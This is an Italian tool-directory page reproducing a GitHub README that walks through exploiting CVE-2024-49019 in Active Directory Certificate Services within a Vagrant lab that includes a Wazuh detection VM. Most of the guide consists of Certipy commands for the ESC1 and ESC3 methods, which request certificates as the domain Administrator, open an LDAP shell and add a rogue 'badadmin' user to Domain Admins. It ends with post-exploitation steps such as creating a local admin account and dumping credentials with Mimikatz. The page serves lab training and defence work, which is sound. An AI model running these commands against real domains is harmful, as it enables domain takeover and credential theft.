Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-49019-rayng — Sfruttamento per CVE-2024-49019 | Kitploit
Strumenti/GitHubGitHub/rayngnpc/cve-2024-49019-rayng
Escalation di PrivilegiMeccanismi di PersistenzaAnalisi delle VulnerabilitàExploitMovimento LateralePost-ExploitPenetration TestingApprendimento e FormazioneLab e Pratica
GitHubrayngnpc/cve-2024-49019-rayng

CVE-2024-49019-rayng

Sfruttamento per CVE-2024-49019

3121 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository

Sfruttare CVE-2024-49019: Escalation di Privilegi dell'Autorità di Certificazione

Panoramica

CVE-2024-49019 è una vulnerabilità nei Servizi Certificati di Active Directory (AD CS) che consente a un attaccante di aumentare i privilegi abusando dell'autenticazione basata su certificati. Questa guida mostra come sfruttare questa vulnerabilità utilizzando Certipy.


Tabella delle Credenziali

Macchina VirtualeNome utentePassword
Windows Server 2022Administrator!@windowsadmintest101
Windows Server 2022testuser$Vulnerable139
Kali-VMvagrantvagrant
Ubuntu-Wazuhwazuhadmin

La macchina virtuale Ubuntu-Wazuh viene utilizzata per scopi di rilevamento. Guida al rilevamento Mitigazione


Passo 1: Clonare il Repository e Configurare le Macchine Virtuali

Per prima cosa, clonare il repository contenente i file necessari:

git clone https://github.com/rayngnpc/CVE-2024-49019-rayng.git
cd CVE-2024-49019-rayng

Installare Vagrant

È necessario installare Vagrant sulla macchina host prima di procedere.

Per Windows

Scaricare e installare Vagrant da qui, o installare usando PowerShell:

choco install vagrant

Per Linux

sudo apt update && sudo apt install vagrant -y

Configurare le Macchine Virtuali

VM Windows Server 2022

cd windows-server2022
vagrant up

VM Kali Linux

cd kali-VM
vagrant up

VM Wazuh Ubuntu

cd WazuhUbuntu
vagrant up

Passo 2: Configurare la Rete Virtuale

Poiché l'exploit richiede una rete NAT, configurare VirtualBox come segue:

Su Windows

Prima di eseguire il comando sottostante, assicurarsi che VBoxManage sia aggiunto alle variabili d'ambiente. In caso contrario, eseguire il comando utilizzando il suo percorso completo:

VBoxManage natnetwork add --netname NatNet1 --network "10.0.2.0/24" --enable

Se VBoxManage non viene riconosciuto, utilizzare:

"C:\Program Files\Oracle\VirtualBox\VBoxManage.exe" natnetwork add --netname NatNet1 --network "10.0.2.0/24" --enable

Su Linux

VBoxManage natnetwork add --netname NatNet1 --network "10.0.2.0/24" --enable

Assicurarsi di controllare tutte le VM in VirtualBox e verificare che siano assegnate all'adattatore di rete NatNetwork - NatNet1. È possibile creare una rete NAT con un nome diverso, ma deve essere nel range IP 10.0.2.0/24.


Nota: Si consiglia di configurare il DNS per il Server Wazuh. In questo caso il DNS dovrebbe essere: 10.0.2.1 - A volte senza internet il controllo API fallirà e non sarà possibile accedere al Dashboard di Wazuh

Passo 3: Modificare il File Hosts

Prima di procedere, assicurarsi che tutte le VM siano accese.

Accedere alla VM Kali Linux per avviare l'attacco e aggiornare il file /etc/hosts:

sudo nano /etc/hosts

Aggiungere la seguente voce:

10.0.2.121 SERVER2022.pchau.domain.local SERVER2022 pchau-SERVER2022-CA pchau.domain.local

Salvare e uscire.


Passo 4: Configurare l'Ambiente

Navigare nella directory CVE-49019 e attivare l'ambiente virtuale Python:

cd ~/CVE-49019
source ~/CVE-49019/rayng/bin/activate

Passo 5: Metodi di Sfruttamento

Ci sono due modi per sfruttare questa vulnerabilità: ESC1 e ESC3.

Metodo ESC1

Trovare Template Vulnerabili

certipy find -dc-ip 10.0.2.121 -username testuser -password '$Vulnerable139' -vulnerable -stdout

Richiedere il Certificato

certipy req -ca pchau-SERVER2022-CA -target-ip 10.0.2.121 -u '[email protected]' -p '$Vulnerable139' -template "WebServer" -upn "[email protected]" --application-policies 'Client Authentication'

Usare il Certificato per l'Accesso alla Shell LDAP

certipy auth -pfx administrator.pfx -ldap-shell -dc-ip 10.0.2.121

Aggiungere un Nuovo Utente

add_user badadmin

Aggiungere Utente al Gruppo Domain Admins

add_user_to_group badadmin "Domain Admins"

Metodo ESC3

Trovare Template Vulnerabili

certipy find -dc-ip 10.0.2.121 -username testuser -password '$Vulnerable139' -vulnerable -stdout

Richiedere il Certificato dall'Utente Test

certipy req -u [email protected] -p '$Vulnerable139' --application-policies "1.3.6.1.4.1.311.20.2.1" -ca 'pchau-SERVER2022-CA' -template WebServer -dc-ip 10.0.2.121

Richiedere il Certificato per l'Amministratore di Dominio utilizzando il certificato di testuser

certipy req -u [email protected] -p '$Vulnerable139' -on-behalf-of PCHAU\\Administrator -template USER -ca 'pchau-SERVER2022-CA' -pfx testuser.pfx -dc-ip 10.0.2.121

Qui è dove questo metodo differisce dall'ESC1, in quanto può richiedere PKINIT e ottenere gli Hash dal TGT

certipy auth -pfx administrator.pfx -dc-ip 10.0.2.121

Nota: Nel caso in cui si ottenga un errore durante il tentativo di richiedere TGT: Kerberos SessionError: KRB_AP_ERR_SKEW (Clock skew too great)

C'è una soluzione alternativa: assicurarsi che la macchina host abbia la stessa ora del server Windows stesso. Assicurarsi di eseguire questo comando per aggiornare la VM Kali-Linux in modo che sia uguale al server Windows.

sudo timedatectl set-ntp off

sudo rdate -n 10.0.2.121

Assicurarsi che il server Windows abbia lo stesso fuso orario della macchina host. Considerare che potrebbe non essere modificabile a causa dell'organizzazione. Si prega di considerare di modificare manualmente il fuso orario per corrispondere alla macchina host. Kali-VM e Windows Server devono avere la stessa ora della macchina host.

È possibile provare a forzare la sincronizzazione dell'ora usando il comando sottostante

w32tm /config /manualpeerlist:"time.windows.com,0x8" /syncfromflags:manual /reliable:yes /update

Usare il Certificato per Ottenere l'Accesso come Amministratore

certipy auth -pfx administrator.pfx -ldap-shell -dc-ip 10.0.2.121

Passo 6: Cosa si Può Fare Dopo lo Sfruttamento?

Una volta ottenuto l'accesso a livello di amministratore, l'attaccante può:

  • Creare e gestire account utente
    net user hacked /add
    net localgroup "Administrators" hacked /add
    
  • Estrarre le credenziali usando Mimikatz:
    sekurlsa::logonpasswords
    
  • Secretdump usando Impacket
  • Wmiexec per accedere alla shell del server Windows
  • Pivot e movimento laterale all'interno della rete
  • Stabilire persistenza
  • Esfiltrare dati sensibili

Per strategie di rilevamento e mitigazione, fare riferimento alla guida al rilevamento.


Conclusione

CVE-2024-49019 presenta un rischio di sicurezza significativo a causa della sua capacità di consentire l'escalation di privilegi non autorizzata. Comprendere questa vulnerabilità e implementare meccanismi di rilevamento adeguati, come l'uso di Wazuh, è fondamentale per proteggere gli ambienti Active Directory.

Per maggiori informazioni sulla sicurezza di AD CS, vedere Microsoft Security CVE-2024-49019.

Scarica lo strumento